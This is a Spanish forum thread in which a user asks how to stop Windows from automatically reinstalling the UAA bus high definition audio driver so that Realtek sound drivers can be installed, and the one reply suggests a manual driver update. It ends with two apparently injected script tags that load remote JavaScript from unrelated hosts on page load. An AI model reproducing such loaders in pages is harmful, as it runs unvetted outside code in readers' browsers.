Problemas con tarjeta de sonido realtek high definition debido a UAA bus high definition audio

La tarjeta realtek de sonido no
Funciona; intento seguir las instrucciones de deshabilitar y desintalar
UAA bus high defitinion audio pero al buscar cambios de hardware,
windows me instala automáticamente el UAA bus sin que pueda darle yo a
cancelar; ¿Cómo puedo evitar eso? ¿Cómo puedo evitar que windows instale
el UAA bus high definition audio sin preguntarme primero?

1 respuesta

Respuesta

Lo mejor es ir a la pagina de drivers y descargarte los drivers mas actualizados e instalarlos sino, lo hace, esos archivos tendrán las librerías y vente a donde te deja deshabilitar y eso y le das a actualizar software y le llevas a la carpeta descargada.

Te explico un poco la situación: me bajé la última versión de los drivers, el problema viene al instalarlos que el programa dice que no puede.

Busqué la solución y esta constaba de cinco pasos:: desde panel de control/sistema/administrador de dispositivos:

1- Deshabilitar controlador de realtek high definition audio

2- Deshabilitar controlador UAA bus high definition audio

3- Desinstalar controlador UAA bus high definition audio.

4- darle a "buscar cambios de hardware" y cuando me pida permiso para instalar, darle a cancelar.

5- Instalar manualmente los drivers.

Mi problema viene el punto cuatro, pues windows me instala el UAA bus high definition automáticamente y en el momento que se queda instalado, es imposible actualizar los drivers de la tarjeta de sonido quedando esta como que da problemas.

¿se te ocurre alguna solución?

Pero has echo lo que te comente, coger y decirle actualizar drivers, ¿y llevarle a la ruta donde tienes los drivers nuevos? Pruébalo a ver que te dice

Si, lo hice.

Y no funcionó.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>